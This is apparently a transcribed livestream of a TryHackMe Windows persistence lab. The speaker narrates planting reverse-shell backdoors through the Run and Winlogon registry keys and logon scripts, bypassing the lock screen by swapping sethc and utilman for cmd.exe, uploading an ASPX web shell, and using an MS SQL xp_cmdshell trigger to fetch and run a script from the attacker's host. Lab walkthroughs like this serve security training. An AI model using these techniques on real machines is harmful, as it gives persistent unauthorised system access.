doing? All right, so there's that, right? So let's go ahead and hop back in. Administrator, and we'll do password 321. And it's going to go insane. Oh, nope, I thought it was going to go insane again. And let's see if we get a reverse shell over here somewhere. It said that it could take between 10 and 20 seconds, so we'll see. And we do. Awesome. Who am I? And we, sure enough, we have a reverse shell for the admin user because we have it for whatever user just logged in. So that's pretty awesome, like right there. Copy that. All right, cool. Now we can go ahead and we can grab that flag, right? So let's go ahead and do that. Oh, and for some reason I'm still missing something, which we're obviously not, because we obviously got a reverse shell. But that's pretty normal in these boxes. Yeah, you're right. Hey, on Tuesday, another one's going to be going up also. We're going to have a lot more stuff in there. So another one's going to be going up. So it's probably because I didn't name it my backdoor. That's probably what it is. Let's go ahead and rename it my backdoor because, you know, obviously the name means a lot. I already forgot where it's at. Let's use my notes for that. Software, Microsoft, Windows. Okay. Where am I here? There's so many that look the same. There we go. Software, Microsoft, Windows. What is it after this? Run or something like that? No, it's not run. So Windows, current version, run. Worked out good. Windows. Where's current version? Did it just go away? Computer, HQ, local machine, software, Microsoft, Windows. Computer, HQ, local machine, software, Microsoft, Windows. Jesus. Windows. Current machine, current version, run. Gotta change up that name of it. I don't know if I care this much. I don't think I can change the name. We could always just do this. Just make another one. What was it called? My Backdoor or something like that? I don't remember what it was even called. My Backdoor. What was I thinking? Oh, God. C, Windows, RevShell.exe. There we go. Karen may not be able to log in to that box then. It may not be the correct credentials. It may be a freaking, you know, just something to make you try different stuff. Karen might not be able to log in with those credentials. Karen credentials might be old. If it's spring 2020, maybe now it's spring 2021. Maybe she spelled it wrong. I don't know. But those, if you have credentials and you have a user and you have SSH and they don't work, credentials are wrong, user's wrong, user can't SSH. One of those three things. Oh, nope. Number 4, SSH is down or you're going to the wrong port. Could be one of those things like right there. Maybe there's more than one SSH port. Let's go ahead and log out. We'll try to log back in again. Maybe it's a honeypot. Password 321. Let's see if we can grab that flag. Probably not. You know, that's pretty normal with boxes like these. We have to do it the exact way that they want you to do it, or else you can't get the flag for some reason. It's pretty funny. Or the box is broke. That's also a very real thing, too. The box just doesn't work anymore. That's a very real possibility, like right there. Hey, look at that. We named it. We renamed it My Backdoor, and it works. Jesus. Don't think for yourself. Don't make your own. No, no, no. We can't be having that. This is more of like a communism, not a democracy. You can't be thinking for yourself. All right. What's next? Win Logon's next. All right. Another alternative to automatically start programs that Logon is abusing Win Logon. All right. Well, let's go ahead and do that. Let's go ahead and copy that. And we'll head back over here and we will do a Win Logon. Copy that. We'll throw these notes over in here also. All right, cool. So let's go ahead and try this guy out. With Logon, use some registry keys under HKLM, software, Microsoft, Windows NT, current version with Logon. Alright, user initiate points to user initiate.exe, okay, which is in charge of restoring your user profile preferences. Shell points to system shell, which is usually explorer.exe. If we replace any executables with some reverse shell, we would break the logon sequence, which isn't desired. Interestingly, you can append commands separated by a comma, and with logon, we'll process them all. Oh, that's good. If you don't think about it. All right, let's go ahead and do that. We're calling this reverse shell again, so we're going to delete our other reverse shell whenever we put this in there. 26.184. We also need to delete our registry key that we had in here, right? Because it's just going to go right back to that again, just like we talked about last time. All right, so let's go ahead and get rid of the registry key. Hopefully I can remember like right where it's at. Oh, there it is. Look at that. Delete that. And delete that. Or else we're just going to be going right back to the one that we just had. So remember, if you're going through this box, make sure you delete the old ones that you did, because you're going to continue to log on. Yes, this may change. I think we're listing on a different port now, so I guess you could keep them in there. But I'd rather just delete them, get this whole thing and everything like that. So let's go ahead and do that one's for revshell.exe. Maybe later. I've done that box many a time, so maybe later. Not right now. All right, let's go ahead and let's go to HK local machine software Microsoft. HK local stage software Microsoft, and we're supposed to be looking for Windows NT now. Right, Windows NT. Current version WinLogon. All right, cool. So we're here now, right? Let's go and take a print screen of that. And we'll copy this guy. And let's go ahead and throw him over in here. And I'm going to show that I made the exploit first. All right, so we can either we then alter either shell or user initiate in there. In this case, we will use user initiate separated by a comma, and we're going to put that rev shell into. But I'm not going to stop the box that I'm on like right now to go check out Linux Privest to see if I can SSH into something, bro. Sorry, like I'm not going to do that. In this case, we will use user initiate, but the procedural shell is the same. Okay, so we're gonna go ahead and do a C Windows rev shell. So let's go ahead and we're gonna use user initiate. And there's already a comma like right there. That's nice. Okay, so C Windows rev shell.exe, right? Okay, cool. And we'll go back over here. We'll throw that in like right there. And we'll go ahead and we'll make sure that we get that reverse shell into C Windows. So let's go into CD into C Windows, and we will do a wget http 10.13.26.184/rev shell.exe out file rev shell.exe. Let's go into a Python 3 over here. And there we go. I believe we just got it. So let's go ahead and we will sign out and sign back in. And we'll see if we get a callback. All right, let's go ahead and sign back in. Administrator, password 321. I don't know if I need a space in between there. I guess we'll find out here in a second. In between that comma. May need a space in between that comma. Right now we're not getting anything back. So let's go ahead. We'll go back into registry editor. So it looks like I might need a space in between that comma, like right there. Yep, still no callback over there. We do have 1030 choices 445242 revshell.exe. Okay. So let's go ahead and throw that into there. And we were on not that. Windows NT. And then from Windows NT, we did a current version when Logon. When Logon, okay. And from here, it didn't save it actually. Maybe that's why. Modify that. Let's go ahead and do a C Windows revshell.exe. Say OK. I'm going to move that over. Take another print screen of this, like right here, and just say notice the space. Copy that. We'll head back over into here. All right, and then we'll go into, we'll log off and log back in again, and hopefully that saves it this time. Go ahead and log back in. And we do get a callback over here. Cool. All right. We got that one. That's pretty cool. Let's go ahead and grab that flag 12 link right there. All right, and now we're on to flag 13. So, logon scripts. Copy that. We'll throw this into here. All right, let's go ahead and do these logon scripts. One of the things user-initiate.exe does while loading your user profiles is check for the environment variable called user-initiate npr logon script. Okay? We can use this environment variable to assign a logon script to a user that will get run when logging into a machine. The variable isn't set by default, so we can just create it and assign a script we like. So we're listening on a different port. I'm not going to delete that last one because we're listening on a different port. Let's go ahead and exit. And we'll go ahead and we will start up another MSF Venom. for 10.13.26.184 on port 4453. Let's go ahead and listen on that port. Just waiting for the MSF meta file to be created. There we go. Let's go ahead and copy that. All right. Now we're obviously going to put it on the machine under C Windows. So let's go ahead and do that like real quick. wget http 10.13.26.184 rev shell.exe. Out file will be rev shell.exe. Let me make sure that I actually have a Python server up. I do not. And we'll go ahead and we'll grab that. Throw that into C Windows. Looks like you got him. And from here, we will go into, looks like registry editor, H key current user, and then environment. So let's go ahead and go into there. Let's go into registry. We're going to go into H key current user, right? So that's going to be way up here most likely. H key current user, and then environment. And we're going to go ahead and we're going to make a reg expand SZ again for C Windows rev shell.exe. Let's go ahead and do that. New expandable string value. And what does he want us to call it? Good. Dear God, we don't want to mess up the name, right? User initiate NPR logon script. That one I think we actually need that name though. There we go. All right, let's go ahead and get that whole thing. And then we'll go ahead and we will modify the binary data, or modify the modify this guy, and we will do a C Windows rev shell.exe. All right, there we go. Let's print screen that. Make sure the file name is the same as above, which I'll throw that file name down here also. Make our lives a little bit easier for when we go back to this guy. Okay, there we go. All right, notice that the registry key has no equivalent HKLM, making your backdoor apply to the current user only. After doing this, sign out of your current session and log in again. You should receive a shell. All right, let's go ahead and do that. We'll sign out. And we'll sign back in. I never even put that shell in the box, did I? Let's go ahead and at least put rev shell into Windows, huh? So let's go ahead and do a... Whoops. Yeah, I did. Did I? I feel like I did. I feel like I put it straight into Windows, actually. So this should take about 10 seconds. Let's give it a couple more seconds. Yeah, because I made it that I just got this guy. So that should have technically worked, I believe. 4453, 4453, 1013, 26, 184. That all looks good. Let's go ahead and look at the registry key again. For current user environment, have it right there. C Windows rev shell.exe. Okay, that all looks good, like right there. Still not getting anything back here yet, though. Let's go ahead and make sure that we actually put that in there. We'll CD into C Windows. All right, then we'll do a wget out file. We'll try this one more time. Rev shell.exe. Maybe I mistyped it. Maybe I did something with it. go ahead and log out. And we'll log back in. We'll see if this one works. All right. Give it about 10 seconds. We'll see if we get anything. This one doesn't seem to want to work. It may also be because that other one, that other registry key, may be trying to run that. So it may not. Let's leave that guy up and running. We'll continue on. We're just going to leave that guy up and running. We'll see if we get anything. But that one does not seem to want to work. I mean, I'm not really too surprised. Not really surprised when it doesn't work. If we have physical access machine or RDP in our case, we can backdoor a login screen to access a terminal without having valid credentials for the machine. Alright, let's go ahead. Oh, sticky keys. Definitely done this one before, like right here. I think I actually have a video coming out soon on doing this with physical access to the machine. We do it through, what is it, a virtual machine, but we put a USB on it, and we do it like that. So let me go ahead and do backdooring the login screen through RDP. That should be over here, backdooring RDP. So we'll go ahead and we'll, there we go. Right. So when pressing key combinations like Control-Delete, you configure Windows to use sticky keys, which allows you to press buttons in the combination. All right, usually shift 5 times. Usually left shift 5 times. All right, if I do like right now. I'm in Linux, so it's not actually going to do anything, but. All right. At the press shift, Windows execute the binary C Windows System 32 set HC. So we can actually change that to be, what is it, command.exe, okay? So all we're going to do is we're just going to kind of copy and paste. Well, we're just going to take command.exe and make it set HC. So as you can see, like right here, he doesn't take own of C Windows 32 set HC. We need to first take ownership of it. All right, let me see how far I went down my notes here. Go and grab that. After doing that, we can go to the lock screen, press shift 5 times. We should be able to have a command prompt running as that user, or NT authority system if you did it through different ways, depending on which way you did it. But let's go ahead and do that. So we're going to the C drive. We're going to take ownership of sethc.exe, which is the sticky keys command. All right. So if we go to our PowerShell, Control V, take ownership of sethc. All right. We are successful in taking ownership of that, right? Now what we're going to do is we're going to go ahead and we are going to do, well, this one like right here, we have to grant administrator access, full access to it, right? It looks like. So we'll go ahead and we'll do that. Let me go ahead and actually start copying these guys over to my notes, just so I don't have to, if I ever do this again, then I don't have to, write out the whole thing. Make my life easy, right? So all we're doing, like right here, is we're giving sethc full or administrator full permissions over sethc, which is going to allow us to rename sethc to command.exe. So we're going to copy. Usually you want to make a backup of it, but whatever. We're just going to copy command.exe over to sethc. All right, there we go. And now if we lock the screen and press shift 5 times, we should get a nice little prompt pop up. I don't know if this is actually going to work with Remina though. Okay, so it will work with Remina. As you see, we didn't have to actually even do that. We do a who am I. And we are administrator, but let's go ahead and do the lock screen like real quick. Just so you can see that it will work without actually being logged on. 1, 2, 3, 4, 5. And we are now, who am I? We are now NT authority system. So we'll copy this. There we go. All right. And I don't know if it's actually give us the flag also because we're NT authority system. Even though he's NT authority system, you never know. Because that happened on one of the other ones. Where we couldn't get the flag because we were NT authority system, which I always find funny. We not copy and paste in here? Should be able to. Oh, we should be able to, but what is it? C flags, flag 14. All right, cool. Actually, let's get in. Breaking through Logon, they're saying. That's what it's called. Let's go ahead and try that down here. See if I can actually paste it, and I cannot. Cool. So, THM breaking through Logon. All right, easy day. So usually with Remedy, you can just copy and paste. It's just being an ass. All right, to trigger our terminal, okay, we'll lock it. Yep, we did that. Oh, another one. So, oh, this one's for probably the on-screen keyboard, right? Which, this one, like right here, Defender picks up pretty quickly, the on-screen keyboard one. Oh, ease of access? Yeah, these ones like right here, Defender usually picks up pretty quickly. So, we can make it to where whenever we click on this button for C systems util-man.exe with system privileges, replace it with the copy of command.exe. I've never really had good luck with this one like right here. Defender always seems to pick it up with the lock screen by. We're doing it right now. Literally doing a lock screen bypass right now. Sticky keys. But yeah, I never really had good luck with the util-man one. Windows Defender always seems to pick it up. Usually with the sticky key stuff, you can actually, like, you can start pressing shift before the computer loads up all the way, and it'll get in there before Windows Defender loads. You just have to move fast what's in there. So make like a quick user, stuff like that, you know? But there we go. All right, so let's go ahead and do this one like right here for util-man. Copy that, and we'll throw them over here also. All right, so let's go ahead and do this one. So we're going to have to take ownership of util-man again, right? And so we can go ahead and take ownership of that. Then we're going to have to copy command.exe to util-man.exe also, okay? So let's take ownership of that first. Let's go ahead and log in. And we'll go ahead and we will run our PowerShell again. Take ownership, right, of util-man. Copy that. Throw it back over into here. There we go. And then we will assign, let administrator have full privilege over it. So we can rename it, right? So we did a full privilege for the administrator. We granted him full privilege with that F over there. So let's go ahead and throw that into our notes. And then from here, we are going to rename him, copy command.exe into util-man.exe. All right, so that's now copied, right? So we should be good with that. And if we get out and then we go to ease of access, we should be able to get a command prompt open up again. Like I said, I don't really have much luck with this on actual machines, but we could try it. You know, obviously I'll try Acme. This thing's probably going to work. So we go to ease of access. There we go. Who am I? I should be NT authority system. And I am. All right, cool. And now we're looking for flag 15 here. See if this one wants to copy and paste. No. Why would you? Flags, flag 15. .exe. Hey, thanks a lot for the follow, Logref. All right, so we got THM. The login screen is merely a suggestion. So we can go ahead and type that in. THM. The login screen is Merely? How do you spell merely? M-E-R-E-L-Y? M-E-R-E-L-Y. Merely a suggestion. There we go. All right, so we got that one like right there, right? Easy day. And let's go ahead and do that last one. We got our last thing here, which is going to be persisting through services. All right. Let's go ahead and do this guy like right here. We got using web shells, okay? So let's see here. If you don't want to use Windows features how to backdoor, you can always profit from any existing service that can be used to run code for you. Yes, you can. All right. Actually, let's go ahead. Let's take a 5-minute break because we're going to have to restart this guy here in less than 7 minutes. So let's go ahead and terminate him. We will start him back up again, and we're going to take a quick 5-minute break. So we've been going for close to an hour now, so take a little break, and then we'll do those guys down there. So I will be right back. Oh, good morning, Ronzon. How you doing? So let's go ahead and do this persisting through existing services. The usual way of achieving persistence in a web server is by uploading a web shell to the web directory. All right. This is trivial and grants access with the privileges of the configured user in IIS, which by default are IIS app pool, default app pool. Even if this is an unprivileged user, it has a special SE impersonate privilege, providing an easy way to escalate to administrator using various known exploits: print spoofer, juicy potato, sweet potato. All right, let's start by downloading an ASP.NET web shell. I think I have a couple of those actually. I wonder if they want me to download a certain one though. They just want me to name it shell.aspx, which I have a couple of those. So if I cd in my tools and I do a locate or a ls-la grep for shell.asp, should have an AS. Do I not have an ASPX shell in here? Okay, maybe I don't. That's weird. Okay, let's go ahead and get one then. What's up, Meow Woo? How you doing? All right, web shell command.aspx. So here's the ASPX web shell. We go ahead and download this guy like right here. Where do I actually put in my reverse shell here? Put in my IP address here. Just nowhere, huh? Just probably just could be for a command prompt or something like that. So we want to actually get a reverse shell. ASPX reverse shell. Let's go ahead and look at that code. And then there we go. That's where we put it in at. So let's go ahead and grab this like right here. And we'll do a nano shell.aspx. Go all the way up and change out that string host to 10.13.26.24. And does it matter what port it wants me on? Do I have to listen on a certain port? Not saying that I do. Okay, so let's just go ahead and do port 1234. That's fine. Looks like. So let's go ahead and do a NC LVMP 1234. And we'll go ahead and we'll do a Python 3 web server. And we'll go into here. Or excuse me, yeah, into here. Nope. Where is my RDP session? It's not up like right now. So let's go ahead and go into here and we'll do an RDP session. Oh, IP address changed, hasn't it? Let's go ahead and grab that new IP address. Huh, strange. Okay, of course they weren't in the box. That's great. Administrator. Password 321. And we'll go ahead and we'll hop it over here, hopefully. Doesn't give us some weird stuff. We're going to go ahead and we're going to upload that into C. iNet pub www root. And then we can go to that on the internet, thus giving us a backdoor. So let's go ahead and CD into there. So we will CD into C drive, directory CD into iNet pub www root. And we'll go ahead and we'll do a wget HTTP 10.13.26.184/184 shell.aspx. Out file will be shell.aspx. And we got him. Cool. Okay. And we'll come over and we'll go to that site /shell.aspx. And we should then receive a backdoor back over here. Should. If that site decides to load and everything else. And if that shell.aspx works correctly. And we do. So there we are. Who am I? Oh, whoops. Who am I? And we are the IIS default app pool. So let me just go ahead and show that we did a shell.aspx. We then uploaded that, right? And from here, we then went to shell.aspx, thus giving us a backdoor. Easy day. There we go. And now we can go ahead and grab that flag. Hopefully, we'll see. I don't know if it expects us to like escalator privileges or what, but. Alright, nope. So we're good with that. Alright, and the last thing we are doing is using MS SQL backdoor. Okay, that's with XP command shell. We can actually do this with what's called Power View or Power Up SQL also. That's another way to be able to do it. We'll say MS SQL backdoor. So you could put in invoke Power SQL, I believe it is, or Power View SQL or something like that. I forget what exactly what it's called. We can go ahead and see it real quick. Rep for SQL. That guy. And it's called Power Up SQL. You can also run it through this guy like right here. All right, and that will also be able to create a backdoor for you also, and you can go into XP command shell and things like that through the PowerShell script. We're going to go ahead and do whatever they want us to do in here. All right, so run the following SQL. So very first thing we got to do is enable. Oh, we got enable and everything? Okay. So we must first reconfigure a few things on database. First, we need to enable XP command shell, stored procedure. XP command shell is a stored procedure that's provided by default in MS SQL. Installation allows you to run commands directly in the system's console, but comes disabled by default. I know it came disabled. To enable, let's open up here. Okay, let's try to find that. Come on, guys, search. There we go. We're going to open up that desktop app like right there. Hey, thanks a lot for the follow, Nicho Vignette. All right. So that's going like right now. Yeah, look at some stuff while that's going. This guy's taking his sweet time opening up, so that's good. Alright. Really taking his sweet time opening up, actually. Oh my god. Are there two trying to open like right now? And just neither one of them's opening? Hey, there we go. Alright, cool. So we finally got here, right? Yeah, I guess we can connect to that. Sure, why not? Alright. We do a new query. We want to find SQL sentences. Copy that. There we go. And we'll go ahead and we'll copy this like right down here, just so we don't have to. Alright. Oh, that's MySQL. It's with MS SQL. It's close. Close to the same thing. A little bit different. Any SQL database is freaking miserable to work on. There we go. Execute. Alright, cool. So that executed. There we go. After putting in the commands, press execute. Okay. After this, we must ensure that any website accessing the database can run XP command shell. By default, only database users with sysadmin role will be able to do so, since it is expected that the web applications use a restricted database user. Okay, let's go ahead and do that. We'll copy that guy right there. And we'll copy down these commands. And we're actually going to change out the IP address to 10.13.26.184. We don't need the 8000 because we're going to make that on port 80, and we do need to make an evil script.ps1. So let's go ahead and do this like right here. We'll do this guy first. Well, nope, he's got that whole thing right there, so we should be good. We should actually be able to do that whole thing because it shouldn't download that script just yet. Yep. Let's go ahead and do that. And we'll hit execute. Create trigger will be the first statement in the query batch. Okay, that's fine. Let's go ahead and delete this stuff like right here. Execute that. Okay. Then we'll go back and we'll use HRDB, I believe it was. And then we'll create the trigger and everything like that. What if I could just do this and just say execute? I wonder if that'll work. No. Okay, so now we got to do rid of this. So now we got to do a use HRDB. I wonder if I can do it like that. No. So we're going to use HRDB, then we're going to create the trigger. That's weird. I feel like it should just be able to do both. Okay, execute that. Put that in there. Glad that saved. That copied really, really well. When I hit Control C, it's doing great. Let's go ahead and throw that into here. We'll execute that. All right, there we go. So that's now been executed on 10.13.26.184. And we'll go ahead and we will create that evil script.ps1 file. Like I said, we can also utilize Power SQL. That is a PowerShell script for this. Well, it's PowerShell script to be able to get different stuff, to be able to get to see about SQL stuff and do XP command shell, things like that. I need to put my IP address in here on 10.13.26.184. Port 4454, looks like. So we want to go ahead and make a nano evil script dot, is that PowerShell? Dot PS1. Okay. Just make sure I didn't have any other ones in there. Alright, so now we have that evil script. Let's go ahead and start up a web server. And let me see what that script is running under again. 4454. I'm going to start up a web server on port 80. We'll exit out here. We'll do a netcat listener for 4454. I think I need that. I don't know. But just in case. Alright. Yep, we do need a netcat listener on 4454. Go ahead and copy that. We'll put this down here. Alright, cool. Now we will need to open two terminals to have the connection key. The trigger before the first connection, download and execute that. With that already, let's navigate to this guy up here and insert an employee into the web application. Since web application will send an insert statement to our database, our trigger will provide us with access to the system. Okay, let's go ahead and go over there. Instead of insert an employee into the database, I think I can just insert whatever the hell I want, can I? Oh, insert. So Ryan 777 test at test.com. That's what it looks like for this part, like right here. Okay, let's go ahead and insert somebody and we'll see if we get called back, I guess. Looks like we're getting called back. Where are we? So we were getting a call back. There we go. Let's go. And we do get called back. We are the MS SQL service. Cool. Never done it like that before. Never done it. I've used XP command shell. I've had to upload commands. I've had to work around PowerShell and stuff like that. Or Windows Defender and antivirus, stuff like that. And put stuff into memory. But I've never had it. I've never done it to where we uploaded it like that. That was pretty cool. I mean, that's also persistent. So, you know, you're not really doing that too much in try-hack-me boxes. But that was pretty freaking cool. All right, well, that was a pretty cool box like right there. That was a pretty cool box. Some of the stuff, obviously, as you can see, did not work. I'll mess with it later on. We'll see if we can get it up and running or whatever else. But some of the stuff, obviously, did not work on here. So, that's just the way it is. So, I think that's going to be it for me. Like, right now, my phone's blowing up. There's idiots at work. And they're being idiots.